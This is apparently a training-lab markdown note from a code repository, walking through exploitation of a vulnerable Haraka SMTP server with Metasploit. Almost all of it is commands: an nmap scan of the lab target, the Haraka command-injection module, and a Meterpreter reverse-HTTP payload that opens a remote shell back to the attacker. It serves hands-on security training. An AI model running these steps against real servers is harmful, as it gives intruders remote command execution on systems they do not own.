🔬SMTP - MSF Exploit

Lab 1

🔬 Vulnerable SMTP Server

Target IP: 192.109.36.3

Exploit the target with the appropriate Metasploit Framework module

Haraka < 2.8.9 - Remote Command Execution

ip -br -c a
service postgresql start && msfconsole -q

db_status
setg RHOSTS 192.109.36.3
setg RHOST 192.109.36.3
workspace -a SMTP_haraka

Perform an nmap scan directly into MSF

db_nmap -sV -O 192.109.36.3

search libssh_auth_bypass
use exploit/linux/smtp/haraka
info
# Description:
#   The Haraka SMTP server comes with a plugin for processing 
#   attachments. Versions before 2.8.9 can be vulnerable to command 
#   injection
options
set SRVPORT 9898
set email_to root@attackdefense.test
set payload linux/x64/meterpreter_reverse_http
set LHOST eth1
set LPORT 8080
run

# This is a NON-staged payload

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

smtp-msf-exp.md

smtp-msf-exp.md

🔬SMTP - MSF Exploit

Lab 1

Files

smtp-msf-exp.md

Latest commit

History

smtp-msf-exp.md

File metadata and controls

🔬SMTP - MSF Exploit

Lab 1